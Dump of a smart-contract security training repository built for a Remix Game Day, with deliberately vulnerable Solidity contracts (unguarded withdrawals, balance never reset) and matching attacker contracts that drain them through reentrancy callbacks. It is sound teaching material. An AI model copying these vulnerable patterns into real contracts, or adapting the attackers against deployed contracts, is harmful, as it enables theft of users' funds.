├── .gitignore ├── .prettierignore ├── .prettierrc ├── README.md ├── contracts ├── .DS_Store ├── puzzle1 │ ├── Attacker1.sol │ ├── Victim1.sol │ └── interface │ │ └── IVictim.sol ├── puzzle2 │ ├── Attacker2.sol │ ├── Victim2.sol │ ├── interface │ │ └── IVictim.sol │ └── token │ │ └── ERC777TestToken.sol └── puzzle3 │ ├── Victim3.sol │ ├── interface │ ├── IDistributor.sol │ └── IVictim.sol │ └── miscs │ ├── Distributor.sol │ ├── Token.sol │ └── Whitelistable.sol ├── hardhat.config.js ├── package.json ├── remix-compiler.config.js ├── tests ├── js_tests │ ├── puzzle1.test.js │ └── puzzle2.test.js └── solidity_tests │ ├── puzzle1_test.sol │ └── puzzle2_test.sol ├── tx_records ├── README.md ├── puzzle1.json └── puzzle2.json └── yarn.lock /.gitignore: -------------------------------------------------------------------------------- 1 | # Logs 2 | logs 3 | *.log 4 | npm-debug.log* 5 | yarn-debug.log* 6 | yarn-error.log* 7 | lerna-debug.log* 8 | .pnpm-debug.log* 9 | 10 | ## hardhat temp files 11 | cache/ 12 | artifacts/ 13 | 14 | # Diagnostic reports (https://nodejs.org/api/report.html) 15 | report.[0-9]*.[0-9]*.[0-9]*.[0-9]*.json 16 | 17 | # Runtime data 18 | pids 19 | *.pid 20 | *.seed 21 | *.pid.lock 22 | 23 | # Directory for instrumented libs generated by jscoverage/JSCover 24 | lib-cov 25 | 26 | # Coverage directory used by tools like istanbul 27 | coverage 28 | *.lcov 29 | 30 | # nyc test coverage 31 | .nyc_output 32 | 33 | # Grunt intermediate storage (https://gruntjs.com/creating-plugins#storing-task-files) 34 | .grunt 35 | 36 | # Bower dependency directory (https://bower.io/) 37 | bower_components 38 | 39 | # node-waf configuration 40 | .lock-wscript 41 | 42 | # Compiled binary addons (https://nodejs.org/api/addons.html) 43 | build/Release 44 | 45 | # Dependency directories 46 | node_modules/ 47 | jspm_packages/ 48 | 49 | # Snowpack dependency directory (https://snowpack.dev/) 50 | web_modules/ 51 | 52 | # TypeScript cache 53 | *.tsbuildinfo 54 | 55 | # Optional npm cache directory 56 | .npm 57 | 58 | # Optional eslint cache 59 | .eslintcache 60 | 61 | # Optional stylelint cache 62 | .stylelintcache 63 | 64 | # Microbundle cache 65 | .rpt2_cache/ 66 | .rts2_cache_cjs/ 67 | .rts2_cache_es/ 68 | .rts2_cache_umd/ 69 | 70 | # Optional REPL history 71 | .node_repl_history 72 | 73 | # Output of 'npm pack' 74 | *.tgz 75 | 76 | # Yarn Integrity file 77 | .yarn-integrity 78 | 79 | # dotenv environment variable files 80 | .env 81 | .env.development.local 82 | .env.test.local 83 | .env.production.local 84 | .env.local 85 | 86 | # parcel-bundler cache (https://parceljs.org/) 87 | .cache 88 | .parcel-cache 89 | 90 | # Next.js build output 91 | .next 92 | out 93 | 94 | # Nuxt.js build / generate output 95 | .nuxt 96 | dist 97 | 98 | # Gatsby files 99 | .cache/ 100 | # Comment in the public line in if your project uses Gatsby and not Next.js 101 | # https://nextjs.org/blog/next-9-1#public-directory-support 102 | # public 103 | 104 | # vuepress build output 105 | .vuepress/dist 106 | 107 | # vuepress v2.x temp and cache directory 108 | .temp 109 | .cache 110 | 111 | # Docusaurus cache and generated files 112 | .docusaurus 113 | 114 | # Serverless directories 115 | .serverless/ 116 | 117 | # FuseBox cache 118 | .fusebox/ 119 | 120 | # DynamoDB Local files 121 | .dynamodb/ 122 | 123 | # TernJS port file 124 | .tern-port 125 | 126 | # Stores VSCode versions used for testing VSCode extensions 127 | .vscode-test 128 | 129 | # yarn v2 130 | .yarn/cache 131 | .yarn/unplugged 132 | .yarn/build-state.yml 133 | .yarn/install-state.gz 134 | .pnp.* 135 | 136 | # remix 137 | .deps 138 | */artifacts -------------------------------------------------------------------------------- /.prettierignore: -------------------------------------------------------------------------------- 1 | node_modules 2 | artifacts 3 | cache 4 | coverage* 5 | gasReporterOutput.json 6 | types 7 | typechain 8 | .deps -------------------------------------------------------------------------------- /.prettierrc: -------------------------------------------------------------------------------- 1 | { 2 | "printWidth": 140, 3 | "tabWidth": 2, 4 | "useTabs": true, 5 | "overrides": [ 6 | { 7 | "files": "*.sol", 8 | "options": { 9 | "printWidth": 100, 10 | "tabWidth": 2, 11 | "useTabs": true, 12 | "singleQuote": false, 13 | "bracketSpacing": true, 14 | "explicitTypes": "always" 15 | } 16 | } 17 | ] 18 | } -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Solidity Puzzles 2 | 3 | ``` 4 | __ __ _ _ _____ _ _ _ 5 | \ \ / / (_| | / ____| | | | | (_) 6 | \ \ / ___ _ __ _| | ___ __ _ | (___ ___ | |_ _| |_ _ ___ _ __ ___ 7 | \ \/ / _ | '__| | |/ _ \ / _` | \___ \ / _ \| | | | | __| |/ _ \| '_ \/ __| 8 | \ | __| | | | | (_) | (_| | ____) | (_) | | |_| | |_| | (_) | | | \__ \ 9 | \/ \___|_| |_|_|\___/ \__, | |_____/ \___/|_|\__,_|\__|_|\___/|_| |_|___/ 10 | __/ | 11 | |___/ 12 | 13 | Verilog Solutions Inc. https://www.verilog.solutions 14 | Verilog is a full-stack web3 security firm, covering smart contract auditing, 15 | validator operations, venture investment, and incubation. 16 | Glad to prepare and present the materials for Game Day Remix in DevConnect Amsterdam! 17 | ``` 18 | 19 | This repo inlcudes three puzzles on smart contract written for Remix Game Day in DevConnect Amsterdam. 20 | 21 | ## Who Are They? 22 | 23 | - **Puzzle One**: Yesterday Once More 24 | Time traveled back to 2016, you are the one who hard-fork the Ethereum blockchain. 25 | 26 | - **Puzzle Two**: Safe and Sound 27 | No worry, our transfer is secured. 28 | 29 | > Puzzle 3 is an extra puzzle. Try solve it and write the unit tests yourself! 30 | 31 | ## Play with Remix 32 | 33 | ### 1 Load files in remix 34 | 35 | - Load files using `dGit` plugin 36 | 1. Open [remix](https://remix.ethereum.org/); 37 | 2. Enable `dGit` plugin in the `PLUGIN MANAGER` tab; 38 | 3. In `dGit` > `CLONE, PUSH, PULL & REMOTES` > `CLONE`, enter URL to this github repo, then click `clone`; 39 | 4. Go to `FILE EXPLORERS` > drag down `workspace` > select the latest workspace, 40 | 41 | ### 2 Play Transactions Recordings 42 | 43 | > Remix has a cool feature. It can record transactions as a scenario files and all the saved transactions can just be executed in one click. 44 | 45 | We record the transactions which includes the contract deployments and attack executions. You can find a series transactions pop up automatically in remix console after playing the transactions. 46 | 47 | 1. Open a scenario file `tx_records/puzzle*.json` 48 | 2. go to `DEPLOY & RUN TRANSACTIONS` > `Transactions recorded` 49 | 3. click the play button 50 | 51 | ### 3 Explore the Remix Debugger 52 | 53 | Inside the remix console, you can see all the transactions. Pick one transaction and click the `Debug` button. 54 | 55 | You can pick the attacking transaction and try debugging it and see what happens exactly inside the exploits. 56 | 57 | ### 4 Run Tests & Try Fix bugs 58 | 59 | We have prepared two kinds of tests. Try run the tests and fix bugs. 60 | 61 | 1. solidity tests for remix unit tests (`tests/solidity_tests/*`) 62 | 63 | You can run it with the `SOLIDITY UNIT TESTING` plugin (need to activate it first inside the `PLUGIN MANAGER`). 64 | 65 | 2. javascripts unit tests which can be run both on remix and hardhat (`tests/js_tests/*`) 66 | 67 | - run on remix. (make sure you compiled all the contracts first) 68 | 69 | Just right click test file at the file explorer and choose `run`. 70 | 71 | - run with hardhat locally with `yarn hardhat test` 72 | 73 | -------------------------------------------------------------------------------- /contracts/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Verilog-Solutions/solidity-puzzles/13a849c698aac73d537b108e489d75c8e1b3a4b5/contracts/.DS_Store -------------------------------------------------------------------------------- /contracts/puzzle1/Attacker1.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: GPL-3.0 2 | /** Do NOT use this code in production ** 3 | __ __ _ _ _____ _ _ _ 4 | \ \ / / (_| | / ____| | | | | (_) 5 | \ \ / ___ _ __ _| | ___ __ _ | (___ ___ | |_ _| |_ _ ___ _ __ ___ 6 | \ \/ / _ | '__| | |/ _ \ / _` | \___ \ / _ \| | | | | __| |/ _ \| '_ \/ __| 7 | \ | __| | | | | (_) | (_| | ____) | (_) | | |_| | |_| | (_) | | | \__ \ 8 | \/ \___|_| |_|_|\___/ \__, | |_____/ \___/|_|\__,_|\__|_|\___/|_| |_|___/ 9 | __/ | 10 | |___/ 11 | 12 | Verilog Solutions Inc. https://www.verilog.solutions 13 | Verilog is a full-stack web3 security firm, covering smart contract auditing, 14 | validator operations, venture investment, and incubation. 15 | Glad to prepare and present the materials for Game Day Remix in DevConnect Amsterdam! 16 | */ 17 | 18 | pragma solidity 0.8.6; 19 | import "./interface/IVictim.sol"; 20 | 21 | /// @title Attacker1 22 | /// @notice Attacker contract for puzzle 1 23 | /// @author Verilog Solutions 24 | contract Attacker1 { 25 | IVictim public victim; 26 | 27 | constructor(address victimAddr) { 28 | victim = IVictim(victimAddr); 29 | } 30 | 31 | function attack() external payable { 32 | victim.deposit{ value: msg.value }(); 33 | victim.withdraw(address(this)); 34 | } 35 | 36 | receive() external payable { 37 | if (address(victim).balance > 0.1 ether) { 38 | victim.withdraw(address(this)); 39 | } 40 | } 41 | } 42 | -------------------------------------------------------------------------------- /contracts/puzzle1/Victim1.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: GPL-3.0 2 | /** Do NOT use this code in production ** 3 | __ __ _ _ _____ _ _ _ 4 | \ \ / / (_| | / ____| | | | | (_) 5 | \ \ / ___ _ __ _| | ___ __ _ | (___ ___ | |_ _| |_ _ ___ _ __ ___ 6 | \ \/ / _ | '__| | |/ _ \ / _` | \___ \ / _ \| | | | | __| |/ _ \| '_ \/ __| 7 | \ | __| | | | | (_) | (_| | ____) | (_) | | |_| | |_| | (_) | | | \__ \ 8 | \/ \___|_| |_|_|\___/ \__, | |_____/ \___/|_|\__,_|\__|_|\___/|_| |_|___/ 9 | __/ | 10 | |___/ 11 | 12 | Verilog Solutions Inc. https://www.verilog.solutions 13 | Verilog is a full-stack web3 security firm, covering smart contract auditing, 14 | validator operations, venture investment, and incubation. 15 | Glad to prepare and present the materials for Game Day Remix in DevConnect Amsterdam! 16 | */ 17 | 18 | pragma solidity 0.8.6; 19 | import "./interface/IVictim.sol"; 20 | 21 | /// @title Victim1 22 | /// @notice Victim contract for puzzle 1 23 | /// @author Verilog Solutions 24 | contract Victim1 is IVictim { 25 | mapping(address => uint256) public amounts; 26 | 27 | //payable constructor. send some ether to this contract during construction 28 | constructor() payable {} 29 | 30 | function deposit() external payable override { 31 | amounts[msg.sender] += msg.value; 32 | } 33 | 34 | function withdraw(address to) external override { 35 | uint256 amount = amounts[msg.sender]; 36 | (bool success, ) = to.call{ value: amount }(""); 37 | require(success, "Victim1:: Withdraw failed."); 38 | amounts[msg.sender] = 0; 39 | } 40 | } 41 | -------------------------------------------------------------------------------- /contracts/puzzle1/interface/IVictim.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: GPL-3.0 2 | /** Do NOT use this code in production ** 3 | __ __ _ _ _____ _ _ _ 4 | \ \ / / (_| | / ____| | | | | (_) 5 | \ \ / ___ _ __ _| | ___ __ _ | (___ ___ | |_ _| |_ _ ___ _ __ ___ 6 | \ \/ / _ | '__| | |/ _ \ / _` | \___ \ / _ \| | | | | __| |/ _ \| '_ \/ __| 7 | \ | __| | | | | (_) | (_| | ____) | (_) | | |_| | |_| | (_) | | | \__ \ 8 | \/ \___|_| |_|_|\___/ \__, | |_____/ \___/|_|\__,_|\__|_|\___/|_| |_|___/ 9 | __/ | 10 | |___/ 11 | 12 | Verilog Solutions Inc. https://www.verilog.solutions 13 | Verilog is a full-stack web3 security firm, covering smart contract auditing, 14 | validator operations, venture investment, and incubation. 15 | Glad to prepare and present the materials for Game Day Remix in DevConnect Amsterdam! 16 | */ 17 | 18 | pragma solidity ^0.8.0; 19 | 20 | interface IVictim { 21 | function deposit() external payable; 22 | 23 | function withdraw(address to) external; 24 | } 25 | -------------------------------------------------------------------------------- /contracts/puzzle2/Attacker2.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: GPL-3.0 2 | /** Do NOT use this code in production ** 3 | __ __ _ _ _____ _ _ _ 4 | \ \ / / (_| | / ____| | | | | (_) 5 | \ \ / ___ _ __ _| | ___ __ _ | (___ ___ | |_ _| |_ _ ___ _ __ ___ 6 | \ \/ / _ | '__| | |/ _ \ / _` | \___ \ / _ \| | | | | __| |/ _ \| '_ \/ __| 7 | \ | __| | | | | (_) | (_| | ____) | (_) | | |_| | |_| | (_) | | | \__ \ 8 | \/ \___|_| |_|_|\___/ \__, | |_____/ \___/|_|\__,_|\__|_|\___/|_| |_|___/ 9 | __/ | 10 | |___/ 11 | 12 | Verilog Solutions Inc. https://www.verilog.solutions 13 | Verilog is a full-stack web3 security firm, covering smart contract auditing, 14 | validator operations, venture investment, and incubation. 15 | Glad to prepare and present the materials for Game Day Remix in DevConnect Amsterdam! 16 | */ 17 | 18 | pragma solidity 0.8.6; 19 | import "@openzeppelin/contracts/token/ERC777/IERC777Recipient.sol"; 20 | import "@openzeppelin/contracts/token/ERC20/IERC20.sol"; 21 | import "./interface/IVictim.sol"; 22 | 23 | /// @title Attacker2 24 | /// @notice Attacker contract for puzzle 2 25 | /// @author Verilog Solutions 26 | contract Attacker2 is IERC777Recipient { 27 | IVictim public victim; 28 | IERC20 public token; 29 | 30 | constructor(address victimAddr, address tokenAddr) { 31 | victim = IVictim(victimAddr); 32 | token = IERC20(tokenAddr); 33 | } 34 | 35 | function attack(uint256 amount) external { 36 | token.transferFrom(msg.sender, address(this), amount); 37 | token.approve(address(victim), amount); 38 | victim.deposit(amount); 39 | victim.withdraw(address(this)); 40 | } 41 | 42 | function tokensReceived( 43 | address, 44 | address from, 45 | address, 46 | uint256, 47 | bytes calldata, 48 | bytes calldata 49 | ) external override { 50 | // mute the compiler warinings 51 | // operator; 52 | // from; 53 | // to; 54 | // amount; 55 | // userData; 56 | // operatorData; 57 | 58 | if (from != address(victim)) { 59 | return; 60 | } 61 | // 10 ** 18 in value == 1 AGT 62 | if (token.balanceOf(address(from)) > 1e18) { 63 | victim.withdraw(address(this)); 64 | } 65 | } 66 | } 67 | -------------------------------------------------------------------------------- /contracts/puzzle2/Victim2.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: GPL-3.0 2 | /** Do NOT use this code in production ** 3 | __ __ _ _ _____ _ _ _ 4 | \ \ / / (_| | / ____| | | | | (_) 5 | \ \ / ___ _ __ _| | ___ __ _ | (___ ___ | |_ _| |_ _ ___ _ __ ___ 6 | \ \/ / _ | '__| | |/ _ \ / _` | \___ \ / _ \| | | | | __| |/ _ \| '_ \/ __| 7 | \ | __| | | | | (_) | (_| | ____) | (_) | | |_| | |_| | (_) | | | \__ \ 8 | \/ \___|_| |_|_|\___/ \__, | |_____/ \___/|_|\__,_|\__|_|\___/|_| |_|___/ 9 | __/ | 10 | |___/ 11 | 12 | Verilog Solutions Inc. https://www.verilog.solutions 13 | Verilog is a full-stack web3 security firm, covering smart contract auditing, 14 | validator operations, venture investment, and incubation. 15 | Glad to prepare and present the materials for Game Day Remix in DevConnect Amsterdam! 16 | */ 17 | 18 | pragma solidity 0.8.6; 19 | import "./interface/IVictim.sol"; 20 | import "@openzeppelin/contracts/token/ERC20/IERC20.sol"; 21 | import "@openzeppelin/contracts/token/ERC777/IERC777Recipient.sol"; 22 | 23 | /// @title Victim2 24 | /// @notice Victim contract for puzzle 2 25 | /// @author Verilog Solutions 26 | contract Victim2 is IVictim, IERC777Recipient { 27 | IERC20 public token; 28 | mapping(address => uint256) public amounts; 29 | 30 | constructor(address tokenAddr) { 31 | token = IERC20(tokenAddr); 32 | // need some intial fund (in terms of AbraveToken) to be exploited 33 | } 34 | 35 | function tokensReceived( 36 | address operator, 37 | address from, 38 | address to, 39 | uint256 amount, 40 | bytes calldata userData, 41 | bytes calldata operatorData 42 | ) external override { 43 | // omit all the parameter unused warnings 44 | operator; 45 | to; 46 | userData; 47 | operatorData; 48 | 49 | amounts[from] += amount; 50 | } 51 | 52 | function deposit(uint256 amount) external override { 53 | token.transferFrom(msg.sender, address(this), amount); 54 | //amounts[msg.sender] += amount; // this is done when tokensReceived() 55 | } 56 | 57 | function withdraw(address recipient) external override { 58 | uint256 amount = amounts[msg.sender]; 59 | token.transfer(recipient, amount); 60 | amounts[msg.sender] = 0; 61 | } 62 | } 63 | -------------------------------------------------------------------------------- /contracts/puzzle2/interface/IVictim.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: GPL-3.0 2 | /** Do NOT use this code in production ** 3 | __ __ _ _ _____ _ _ _ 4 | \ \ / / (_| | / ____| | | | | (_) 5 | \ \ / ___ _ __ _| | ___ __ _ | (___ ___ | |_ _| |_ _ ___ _ __ ___ 6 | \ \/ / _ | '__| | |/ _ \ / _` | \___ \ / _ \| | | | | __| |/ _ \| '_ \/ __| 7 | \ | __| | | | | (_) | (_| | ____) | (_) | | |_| | |_| | (_) | | | \__ \ 8 | \/ \___|_| |_|_|\___/ \__, | |_____/ \___/|_|\__,_|\__|_|\___/|_| |_|___/ 9 | __/ | 10 | |___/ 11 | 12 | Verilog Solutions Inc. https://www.verilog.solutions 13 | Verilog is a full-stack web3 security firm, covering smart contract auditing, 14 | validator operations, venture investment, and incubation. 15 | Glad to prepare and present the materials for Game Day Remix in DevConnect Amsterdam! 16 | */ 17 | 18 | pragma solidity ^0.8.0; 19 | 20 | interface IVictim { 21 | function deposit(uint256 amount) external; 22 | 23 | function withdraw(address recipient) external; 24 | } 25 | -------------------------------------------------------------------------------- /contracts/puzzle2/token/ERC777TestToken.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: GPL-3.0 2 | /** Do NOT use this code in production ** 3 | __ __ _ _ _____ _ _ _ 4 | \ \ / / (_| | / ____| | | | | (_) 5 | \ \ / ___ _ __ _| | ___ __ _ | (___ ___ | |_ _| |_ _ ___ _ __ ___ 6 | \ \/ / _ | '__| | |/ _ \ / _` | \___ \ / _ \| | | | | __| |/ _ \| '_ \/ __| 7 | \ | __| | | | | (_) | (_| | ____) | (_) | | |_| | |_| | (_) | | | \__ \ 8 | \/ \___|_| |_|_|\___/ \__, | |_____/ \___/|_|\__,_|\__|_|\___/|_| |_|___/ 9 | __/ | 10 | |___/ 11 | 12 | Verilog Solutions Inc. https://www.verilog.solutions 13 | Verilog is a full-stack web3 security firm, covering smart contract auditing, 14 | validator operations, venture investment, and incubation. 15 | Glad to prepare and present the materials for Game Day Remix in DevConnect Amsterdam! 16 | */ 17 | 18 | pragma solidity 0.8.6; 19 | 20 | import "@openzeppelin/contracts/token/ERC20/ERC20.sol"; 21 | import "@openzeppelin/contracts/utils/Address.sol"; 22 | import "@openzeppelin/contracts/token/ERC777/IERC777Recipient.sol"; 23 | 24 | /// @title ERC777TestToken 25 | /// @notice simple version of ERC777. Do not use it in productions 26 | /// @author Verilog Solutions 27 | contract ERC777TestToken is ERC20 { 28 | constructor(uint256 initialSupply) ERC20("ERC777 Test Token", "Token") { 29 | // mint some initial supply 30 | _mint(msg.sender, initialSupply); 31 | } 32 | 33 | // buy token with ether 34 | function buy(address to) external payable { 35 | // let's do a 1:1 exchange from eth to token 36 | _mint(to, msg.value); 37 | } 38 | 39 | function transfer(address _to, uint256 _value) public override returns (bool) { 40 | require(super.transfer(_to, _value)); 41 | callAfterTransfer(msg.sender, _to, _value); 42 | return true; 43 | } 44 | 45 | function transferFrom( 46 | address _from, 47 | address _to, 48 | uint256 _value 49 | ) public override returns (bool) { 50 | require(super.transferFrom(_from, _to, _value)); 51 | callAfterTransfer(_from, _to, _value); 52 | return true; 53 | } 54 | 55 | function callAfterTransfer( 56 | address _from, 57 | address _to, 58 | uint256 _value 59 | ) internal { 60 | if (Address.isContract(_to)) { 61 | IERC777Recipient(_to).tokensReceived( 62 | address(0), 63 | _from, 64 | _to, 65 | _value, 66 | new bytes(0), 67 | new bytes(0) 68 | ); 69 | } 70 | } 71 | } 72 | -------------------------------------------------------------------------------- /contracts/puzzle3/Victim3.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: GPL-3.0 2 | /** Do NOT use this code in production ** 3 | __ __ _ _ _____ _ _ _ 4 | \ \ / / (_| | / ____| | | | | (_) 5 | \ \ / ___ _ __ _| | ___ __ _ | (___ ___ | |_ _| |_ _ ___ _ __ ___ 6 | \ \/ / _ | '__| | |/ _ \ / _` | \___ \ / _ \| | | | | __| |/ _ \| '_ \/ __| 7 | \ | __| | | | | (_) | (_| | ____) | (_) | | |_| | |_| | (_) | | | \__ \ 8 | \/ \___|_| |_|_|\___/ \__, | |_____/ \___/|_|\__,_|\__|_|\___/|_| |_|___/ 9 | __/ | 10 | |___/ 11 | 12 | Verilog Solutions Inc. https://www.verilog.solutions 13 | Verilog is a full-stack web3 security firm, covering smart contract auditing, 14 | validator operations, venture investment, and incubation. 15 | Glad to prepare and present the materials for Game Day Remix in DevConnect Amsterdam! 16 | */ 17 | 18 | pragma solidity 0.8.6; 19 | import "@openzeppelin/contracts/token/ERC20/IERC20.sol"; 20 | import "./interface/IVictim.sol"; 21 | import "./interface/IDistributor.sol"; 22 | 23 | /// @title Victim3 24 | /// @notice Victim contract for puzzle 3 25 | /// @author Verilog Solutions 26 | contract Victim3 is IVictim { 27 | IERC20 public token; 28 | mapping(address => uint256) public amounts; 29 | 30 | constructor(IERC20 tokenAddr) { 31 | token = IERC20(tokenAddr); 32 | } 33 | 34 | function deposit(uint256 amount) external override { 35 | token.transferFrom(msg.sender, address(this), amount); 36 | amounts[msg.sender] += amount; 37 | } 38 | 39 | function claim(IDistributor distributor, address recipient) external override { 40 | uint256 amount = amounts[msg.sender]; 41 | distributor.distribute(recipient, amount); 42 | // amounts[msg.sender] = 0; 43 | } 44 | } 45 | -------------------------------------------------------------------------------- /contracts/puzzle3/interface/IDistributor.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: GPL-3.0 2 | /** Do NOT use this code in production ** 3 | _ _ _ _ 4 | | | | | (_) | 5 | | | | |___ ____ _| | ___ ____ 6 | \ \/ / _ )/ ___) | |/ _ \ / _ | 7 | \ ( (/ /| | | | | |_| ( ( | | 8 | _ \/ \____)_| |_|_|\___/ \_|| | 9 | | | | | _ (_____| 10 | \ \ ___ | |_ _| |_ (_) ___ ____ ___ 11 | \ \ / _ \| | | | | _)| |/ _ \| _ \ /___) 12 | _____) ) |_| | | |_| | |__| | |_| | | | |___ | 13 | (______/ \___/|_|\____|\___)_|\___/|_| |_(___/ 14 | 15 | Verilog Solutions Inc. https://www.verilog.solutions 16 | Verilog is a full-stack web3 security firm, covering smart contract auditing, 17 | validator operations, venture investment, and incubation. 18 | Glad to prepare and present the materials for Game Day Remix in DevConnect Amsterdam! 19 | */ 20 | 21 | pragma solidity 0.8.6; 22 | 23 | interface IDistributor { 24 | function distribute(address recipient, uint256 amount) external; 25 | } 26 | -------------------------------------------------------------------------------- /contracts/puzzle3/interface/IVictim.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: GPL-3.0 2 | /** Do NOT use this code in production ** 3 | _ _ _ _ 4 | | | | | (_) | 5 | | | | |___ ____ _| | ___ ____ 6 | \ \/ / _ )/ ___) | |/ _ \ / _ | 7 | \ ( (/ /| | | | | |_| ( ( | | 8 | _ \/ \____)_| |_|_|\___/ \_|| | 9 | | | | | _ (_____| 10 | \ \ ___ | |_ _| |_ (_) ___ ____ ___ 11 | \ \ / _ \| | | | | _)| |/ _ \| _ \ /___) 12 | _____) ) |_| | | |_| | |__| | |_| | | | |___ | 13 | (______/ \___/|_|\____|\___)_|\___/|_| |_(___/ 14 | 15 | Verilog Solutions Inc. https://www.verilog.solutions 16 | Verilog is a full-stack web3 security firm, covering smart contract auditing, 17 | validator operations, venture investment, and incubation. 18 | Glad to prepare and present the materials for Game Day Remix in DevConnect Amsterdam! 19 | */ 20 | 21 | pragma solidity 0.8.6; 22 | import "./IDistributor.sol"; 23 | 24 | interface IVictim { 25 | function deposit(uint256 amount) external; 26 | 27 | function claim(IDistributor distributor, address recipient) external; 28 | } 29 | -------------------------------------------------------------------------------- /contracts/puzzle3/miscs/Distributor.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: GPL-3.0 2 | /** Do NOT use this code in production ** 3 | __ __ _ _ _____ _ _ _ 4 | \ \ / / (_| | / ____| | | | | (_) 5 | \ \ / ___ _ __ _| | ___ __ _ | (___ ___ | |_ _| |_ _ ___ _ __ ___ 6 | \ \/ / _ | '__| | |/ _ \ / _` | \___ \ / _ \| | | | | __| |/ _ \| '_ \/ __| 7 | \ | __| | | | | (_) | (_| | ____) | (_) | | |_| | |_| | (_) | | | \__ \ 8 | \/ \___|_| |_|_|\___/ \__, | |_____/ \___/|_|\__,_|\__|_|\___/|_| |_|___/ 9 | __/ | 10 | |___/ 11 | 12 | Verilog Solutions Inc. https://www.verilog.solutions 13 | Verilog is a full-stack web3 security firm, covering smart contract auditing, 14 | validator operations, venture investment, and incubation. 15 | Glad to prepare and present the materials for Game Day Remix in DevConnect Amsterdam! 16 | */ 17 | 18 | pragma solidity 0.8.6; 19 | 20 | import "@openzeppelin/contracts/access/Ownable.sol"; 21 | import "@openzeppelin/contracts/token/ERC20/IERC20.sol"; 22 | import { Whitelistable } from "./Whitelistable.sol"; 23 | import { IDistributor } from "../interface/IDistributor.sol"; 24 | 25 | /// @title Distributor 26 | /// @notice A Distributor to distribite tokens 27 | /// @author Verilog Solutions 28 | contract Distributor is IDistributor, Ownable, Whitelistable { 29 | IERC20 public token; 30 | 31 | constructor(IERC20 tokenAddr) { 32 | token = IERC20(tokenAddr); 33 | } 34 | 35 | function distribute(address recipient, uint256 amount) 36 | external 37 | override 38 | onlyWhitelist 39 | //only the Victim contract address is in whitelist 40 | { 41 | token.transfer(recipient, amount); 42 | } 43 | } 44 | -------------------------------------------------------------------------------- /contracts/puzzle3/miscs/Token.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: GPL-3.0 2 | /** Do NOT use this code in production ** 3 | __ __ _ _ _____ _ _ _ 4 | \ \ / / (_| | / ____| | | | | (_) 5 | \ \ / ___ _ __ _| | ___ __ _ | (___ ___ | |_ _| |_ _ ___ _ __ ___ 6 | \ \/ / _ | '__| | |/ _ \ / _` | \___ \ / _ \| | | | | __| |/ _ \| '_ \/ __| 7 | \ | __| | | | | (_) | (_| | ____) | (_) | | |_| | |_| | (_) | | | \__ \ 8 | \/ \___|_| |_|_|\___/ \__, | |_____/ \___/|_|\__,_|\__|_|\___/|_| |_|___/ 9 | __/ | 10 | |___/ 11 | 12 | Verilog Solutions Inc. https://www.verilog.solutions 13 | Verilog is a full-stack web3 security firm, covering smart contract auditing, 14 | validator operations, venture investment, and incubation. 15 | Glad to prepare and present the materials for Game Day Remix in DevConnect Amsterdam! 16 | */ 17 | 18 | pragma solidity 0.8.6; 19 | import "@openzeppelin/contracts/token/ERC20/ERC20.sol"; 20 | 21 | /// @title Token 22 | /// @notice Test token. Do not use it in productions 23 | /// @author Verilog Solutions 24 | contract Token is ERC20 { 25 | constructor(uint256 initialSupply) ERC20("TEST Token", "T-Token") { 26 | _mint(msg.sender, initialSupply); 27 | } 28 | 29 | function buy() external payable { 30 | // let's do a 1:1 exchange from eth to pensionToken 31 | _mint(msg.sender, msg.value); 32 | } 33 | 34 | // all other functions (like transfer(), balanceOf() are inherited from ERC20.) 35 | } 36 | -------------------------------------------------------------------------------- /contracts/puzzle3/miscs/Whitelistable.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: GPL-3.0 2 | /** Do NOT use this code in production ** 3 | __ __ _ _ _____ _ _ _ 4 | \ \ / / (_| | / ____| | | | | (_) 5 | \ \ / ___ _ __ _| | ___ __ _ | (___ ___ | |_ _| |_ _ ___ _ __ ___ 6 | \ \/ / _ | '__| | |/ _ \ / _` | \___ \ / _ \| | | | | __| |/ _ \| '_ \/ __| 7 | \ | __| | | | | (_) | (_| | ____) | (_) | | |_| | |_| | (_) | | | \__ \ 8 | \/ \___|_| |_|_|\___/ \__, | |_____/ \___/|_|\__,_|\__|_|\___/|_| |_|___/ 9 | __/ | 10 | |___/ 11 | 12 | Verilog Solutions Inc. https://www.verilog.solutions 13 | Verilog is a full-stack web3 security firm, covering smart contract auditing, 14 | validator operations, venture investment, and incubation. 15 | Glad to prepare and present the materials for Game Day Remix in DevConnect Amsterdam! 16 | */ 17 | 18 | pragma solidity 0.8.6; 19 | 20 | import "@openzeppelin/contracts/access/Ownable.sol"; 21 | 22 | abstract contract Whitelistable is Ownable { 23 | mapping(address => bool) public whitelist; 24 | 25 | event WhitelistChanged(address user, bool whitelisted); 26 | 27 | modifier onlyWhitelist() { 28 | // solhint-disable-next-line reason-string 29 | require(whitelist[msg.sender], "Whitelistable: caller not whitelisted"); 30 | _; 31 | } 32 | 33 | function addToWhitelist(address _user) external onlyOwner { 34 | whitelist[_user] = true; 35 | emit WhitelistChanged(_user, true); 36 | } 37 | 38 | function removeFromWhitelist(address _user) external onlyOwner { 39 | whitelist[_user] = false; 40 | emit WhitelistChanged(_user, false); 41 | } 42 | } 43 | -------------------------------------------------------------------------------- /hardhat.config.js: -------------------------------------------------------------------------------- 1 | require("@nomiclabs/hardhat-waffle"); 2 | 3 | /** 4 | * @type import('hardhat/config').HardhatUserConfig 5 | */ 6 | module.exports = { 7 | solidity: "0.8.6", 8 | 9 | paths: { 10 | sources: "./contracts", 11 | tests: "./tests", 12 | }, 13 | }; 14 | -------------------------------------------------------------------------------- /package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "Soldity-Puzzles", 3 | "author": "Verilog Solutions Inc", 4 | "license": 